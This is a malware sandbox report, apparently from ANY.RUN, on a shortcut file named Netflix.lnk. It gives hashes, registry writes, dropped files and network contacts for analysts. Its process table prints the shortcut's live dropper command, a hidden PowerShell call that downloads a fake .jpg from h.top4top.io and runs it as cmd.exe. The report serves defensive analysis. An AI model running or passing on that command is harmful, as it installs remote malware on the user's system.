File name: | Netflix.lnk |
Full analysis: | https://app.any.run/tasks/bcfb36ea-8fbb-40d7-9f28-d2aff6289391 |
Verdict: | Malicious activity |
Analysis date: | December 05, 2022, 22:40:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized |
MD5: | 86A9598CFD644C0E6258A2D7A2B45464 |
SHA1: | 1AAE88AE17D4A342C36F1248B4754134A19E6261 |
SHA256: | 1A62C862051D4C79FC9FDAD6BD9462EA085E957115AC37DC674E7CF7EB3155E0 |
SSDEEP: | 12:85C3pQVe/YJk4k3oUsO/pnsKtW+UcCsvXVQL6H/sflXJslD86iP17t8otrUMMlWa:80pQQ3vrQ+/CWC+Oy+t8wrUMkWnQ38A |
.lnk | | | Windows Shortcut (100) |
---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1580 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://h.top4top.io/p_156728vz81.jpg','C:\Users\admin\AppData\Roaming\cmd.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cmd.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
|
(PID) Process: | (1580) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1580) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | FileTracingMask |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
1580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ee6297ca66b6a3bb.customDestinations-ms | binary | |
MD5:46E58E2A7FB602A3E10F56443100A4BA | SHA256:B7A647D53D55C0C951718C869202F16662F25B40122DF6DC59EBE589B9F9AE0D | |||
1580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CQJLX0E4CSUMTAP493Y1.temp | binary | |
MD5:46E58E2A7FB602A3E10F56443100A4BA | SHA256:B7A647D53D55C0C951718C869202F16662F25B40122DF6DC59EBE589B9F9AE0D | |||
1580 | powershell.exe | C:\Users\admin\AppData\Local\Temp\01iqd3zi.hmq.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1580 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
1580 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:1068BF0B9B98C206F587A7DB05F6DD06 | SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB | |||
1580 | powershell.exe | C:\Users\admin\AppData\Local\Temp\j4iho2os.ry2.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1580 | powershell.exe | 209.197.3.8:80 | ctldl.windowsupdate.com | STACKPATH-CDN | US | whitelisted |
1580 | powershell.exe | 51.159.67.135:443 | h.top4top.io | Online S.a.s. | FR | suspicious |
Domain | IP | Reputation |
---|---|---|
h.top4top.io |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
dns.msftncsi.com |
| shared |